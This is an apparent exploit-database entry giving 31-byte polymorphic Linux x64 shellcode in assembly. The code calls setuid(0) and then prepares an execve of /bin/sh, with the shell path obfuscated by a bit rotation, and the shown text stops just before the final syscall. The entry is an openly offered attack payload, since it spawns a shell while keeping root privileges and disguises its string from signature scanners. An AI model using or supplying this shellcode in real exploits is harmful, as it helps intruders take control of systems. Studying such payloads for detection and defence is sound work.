Linux/x64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)




31 bytes





; For a detailed explanation of this shellcode see my blog post: 

global _start 

section .text

; setuid(0)
	xor edi,edi
	push rdi ; null terminator for the following string	
	push 105
	pop rax
	; push /bin//sh in reverse 
	mov rbx,0xd0e65e5edcd2c45e

; execve
	ror rbx,1
	mov al,59
	push rbx
	xchg esi,edi
	push rsp
	; store /bin//sh address in RDI, points at string
	pop rdi
	; Call the Execve syscall 